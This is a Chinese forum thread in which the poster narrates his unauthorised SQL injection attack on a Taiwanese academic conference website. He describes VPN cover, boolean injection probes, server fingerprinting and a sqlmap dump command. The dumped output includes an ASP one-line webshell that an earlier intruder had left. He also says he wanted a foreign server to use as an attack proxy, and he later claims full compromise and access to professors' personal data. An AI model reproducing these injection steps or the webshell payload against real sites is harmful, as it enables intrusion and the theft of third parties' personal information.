一次对台湾某网站的渗透测试
smith2015/06/08软件综合 IP:广东
先说一下结果,没有成功,所以直接把网站地址发出来了。新手上路大牛莫喷,再加上这个站的价值也不大,没有什么信息。
网站地址这个:
XXXXXXXXXXXXXXXXXXXXX/XXXXXXXXp?id=2
这个网站是在百度锁定关键词org和asp找到的,这一类的站点漏洞比较多
页面还挺漂亮,和鬼子有联系?,The Asian Conference on Engineering and Natural Sciences,好高大上的东西啊,不懂,要是能搞到点什么碳纤维的资料报效一下国家就好了[s::lol] site1.jpg
来自:计算机科学 / 软件综合
17
已屏蔽 原因:{{ notice.reason }}已屏蔽
{{notice.noticeContent}}
~~空空如也
smith 作者
9年7个月前 IP:广东
772402
先挂上VPN,这样我的IP就变成了某个小岛了,然后试一下
XXXXXXXXXXXXXXXXXXXXX/XXXXXXXXp?id=2 and 1=1
正常 SITE2.jpg
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772403
再试了一下
XXXXXXXXXXXXXXXXXXXXX/XXXXXXXXp?id=2 and 1=2
没有任何显示,前后的内容不一样,证明有sql注入点存在 SITE3.jpg
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772406
用whatweb看了一下:
XXXXXXXXXXXXXXXXXXXXX/XXXXXXXXp [200] ASP_NET, Cookies[ASPSESSIONIDSSCARARB], Country[TAIWAN; REPUBLIC OF CHINA (ROC)][TW], HTTPServer[Microsoft-IIS/6.0], IP[220.133.246.2], Microsoft-IIS[6.0], PasswordField[userpass], Script[text/javascript], Title[Asian Conference on Engineering and Natural Sciences], X-Powered-By[XXXXXXT]
所以说它是台湾的站,不是日本的有点失望,不过不在大陆我就放心多了,可以顺利地弄,这里也确认了网站是IIS 6.0 和asp的架构,至于数据库是什么就不知道了
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772407
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772410
在这之前试了一下手动猜解表,admin和administrator、acens都试过了,没有一个猜出来,感觉其他人写得文章里面的步骤两下就猜出表来了有点不可思议,果然还是要靠工具吗?于是用sqlmap试了一下
上了sqlmap就开始哗啦啦地跑,此处略去大量打印,总之跑完之后猜出了以下的东西

python XXXXXXXXX -u XXXXXXXXXXXXXXXXXXXXX/XXXXXXXXp?id=2 --dump -T banner -C"name,id"
Database: Microsoft_Access_masterdb
Table: banner
[3 entries]
+----+-------------------------------+------------------------------------------+
| id | name                          | picurl                                   |
+----+-------------------------------+------------------------------------------+
| 10 | NULL                          | ../Upload/PicFiles/XXXXXXXXXXXXXXXXXXXg  |
| 3  | <%execute(request("admin"))%> | ../Upload/PicFiles/XXXXXXXXXXXXXXXXXXXXg |
| 4  | NULL                          | ../Upload/PicFiles/XXXXXXXXXXXXXXXXXXXXg |
+----+-------------------------------+------------------------------------------+
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772411
第一个证明这个网站是IIS6.0 + access的,好老,挂不得会被发现有漏洞,

第二个找到一个表表名是banner,这个确实是不常见的表名。也不太清楚这个表的作用是干嘛。

第三个<%execute(request("admin"))%>明显就是一句话木马,证明这个网站已经有人入侵过了,估计已经拿了shell,而且还很长一段时间了。看来这个网站已经被别人入侵过了,很失望。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772413
我猜想之前的黑阔也是用这种方法注入进来的,然后把<%execute(request("admin"))%>写到数据库里面,再把这段代码导出到网站目录下形成一个木马。
接着利用工具连接上去,就拿到了这个网站的webshell。不过这个黑阔也太懒了,做过手脚也不清除一下,然而相比之下,这个网站的管理员更懒,网站被入侵了也没有发现
引用
评论
2
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772415
看了一下,这个网站也不算什么野鸡网站,还有注册页面,估计应该也有学者在里面注册填上自己的信息,如果真的填上真实信息的话,后果可怕[s::lol]

网页还有一些相关的知名大学和教授的名字,日本的东大也有好几个叫兽。
International Committee

Kyung-Suk Cho, Ewha Womans University

Shigeo Honma, Tokay University

Abdullah Ozer, Sultan Qaboos University

Frank F.S. Shieu, National Chung Hsing University

Dennis Y.C Leung, The University of Hong Kong

Goh Joo Kheng, Monash University

Sheng-Yen Hsu, National Sun Yat-sen University

Jeng-Kuei Chang, National Central University

Thippayarat Chahomchuen, Kasetsart University

Yasuhiko Koike, Tokyo University of Agriculture

Istvan Toth, University of Queensland

Dr.S.Ahmed John, Jamal Mohamed College,

Prof. Amel L, Magallanes, Capiz State University

Huada Daniel Ruan, Beijing Normal University-Hong Kong
Baptist University United International College(UIC)

Farhad Memarzadeh, National Institutes of Health

Dr. Asif Mahmood, King Saud University, Riyadh
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772417
尝试了多种方法暴露网站的绝对路径,这样我也可以像上一个黑阔那样拿到shell,但试了一下没有用,没有绝对路径我就没法写shell
渐渐地,我对这个网站失去兴趣,主要是这个网站是win系统的,而我的目的是能找到一台linux系统的机器来做代理,继续弄下去也没有太多的意义。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772418
这里看来,网站的安全确实很有必要。那些报名参加这个会议的教授们如果填写了自己的真实信息,如电话号码、地址、年龄、专业。。。。
这些信息的话,被拿别人拿到是很容易的事情。而在美国个人信息泄露网站是要背负责任的,而中国的话不管是大陆还是台湾,似乎都没有什么管的。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772422
最后查了一下,这个The Asian Conference on Engineering and Natural Sciences是在日本福冈举办的会议,这类会议属于付费投稿式的会议,也就是参会的教授要交钱(学校出),会议上教授可以对自己的研究进行公开交流提高自己在学术界的影响。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年7个月前 IP:广东
772427
引用 熊猫阿Bo:
挂上VPN有一个误区,那就是在快速全网扫描平民化的今天,跳板的单跳将被快速、有效、简单地识别出来,在网络攻击的源头追查上,单跳的VPN存在这样的问题:1.VPN提供者的可信性问题。2.额……我已经说了,单跳和没跳的差别越来越小。3.所有流量...
vpn这里还好,再加上我只拿国外网站测试,没有什么问题。
其实像tor这一类的我也考虑过,但无奈速度太慢,根本无法用来做爆破或机器注入,只好放弃
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年6个月前 IP:广东
774174
这个网站已经拿下,旁站解MD5拿下后沦陷,
下面是控制面板,大量教授的信息 hack_package2.jpg
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论

想参与大家的讨论?现在就 登录 或者 注册

所属专业
上级专业
同级专业
smith
学者 机友 笔友
文章
188
回复
2347
学术分
4
2015/01/11注册,46分30秒前活动

收音机爱好者

主体类型:个人
所属领域:无
认证方式:手机号
IP归属地:广东
文件下载
加载中...
{{errorInfo}}
{{downloadWarning}}
你在 {{downloadTime}} 下载过当前文件。
文件名称:{{resource.defaultFile.name}}
下载次数:{{resource.hits}}
上传用户:{{uploader.username}}
所需积分:{{costScores}},{{holdScores}}下载当前附件免费{{description}}
积分不足,去充值
文件已丢失

当前账号的附件下载数量限制如下:
时段 个数
{{f.startingTime}}点 - {{f.endTime}}点 {{f.fileCount}}
视频暂不能访问,请登录试试
仅供内部学术交流或培训使用,请先保存到本地。本内容不代表科创观点,未经原作者同意,请勿转载。
音频暂不能访问,请登录试试
支持的图片格式:jpg, jpeg, png
插入公式
评论控制
加载中...
文号:{{pid}}
投诉或举报
加载中...
{{tip}}
请选择违规类型:
{{reason.type}}

空空如也

加载中...
详情
详情
推送到专栏从专栏移除
设为匿名取消匿名
查看作者
回复
只看作者
加入收藏取消收藏
收藏
取消收藏
折叠回复
置顶取消置顶
评学术分
鼓励
设为精选取消精选
管理提醒
编辑
通过审核
评论控制
退修或删除
历史版本
违规记录
投诉或举报
加入黑名单移除黑名单
查看IP
{{format('YYYY/MM/DD HH:mm:ss', toc)}}